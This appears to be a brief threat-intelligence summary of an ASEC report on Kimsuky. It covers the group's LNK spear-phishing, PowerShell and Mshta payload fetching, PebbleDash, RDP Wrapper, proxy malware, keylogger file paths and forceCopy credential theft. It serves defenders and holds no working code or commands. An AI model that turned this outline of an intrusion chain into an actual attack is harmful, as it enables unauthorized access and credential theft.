ASEC reports that Kimsuky continues to deliver malicious LNK files through spear-phishing, with filenames tailored to specific people or companies. The LNK files run PowerShell or Mshta to fetch payloads, and the final control tools include PebbleDash and a custom RDP Wrapper used to enable remote access on infected systems. The source also describes proxy malware for reaching hosts behind private networks, keyloggers writing to paths such as C:\Programdata\joeLog.txt and C:\Programdata\jLog.txt, and forceCopy tooling that uses an NTFS Parser library to copy browser configuration files. Recent samples also include Loader, Injector, and ReflectiveLoader components, showing a shift toward RDP Wrapper, proxy access, and credential theft rather than only conventional backdoor deployment.